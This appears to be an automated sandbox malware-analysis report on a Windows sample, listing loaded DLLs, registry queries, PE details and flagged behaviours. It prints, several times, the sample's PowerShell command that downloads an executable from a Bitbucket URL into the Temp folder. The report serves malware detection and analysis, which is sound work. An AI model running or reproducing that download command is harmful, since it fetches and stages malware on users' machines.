Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Gq48hjKhZf.exe

Static PE information: Image base 0x140000000 > 0x60000000

Data Obfuscation

Suspicious powershell command line found

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";			Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe

Code function: 0_2_000000014000D9C4 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_000000014000D9C4

Source: Gq48hjKhZf.exe

Static PE information: section name: .code

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe

Code function: 0_2_000000014001BD3E push rbx; ret

0_2_000000014001BD3F

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell /nop /com "(New-Object Net.WebClient).DownloadFile('https://bitbucket.org/mynewworkspace123312/scnd/downloads/AHPOBS.exe', 'C:\Users\user\AppData\Local\Temp\AHPOBS.exe')";			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Gq48hjKhZf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
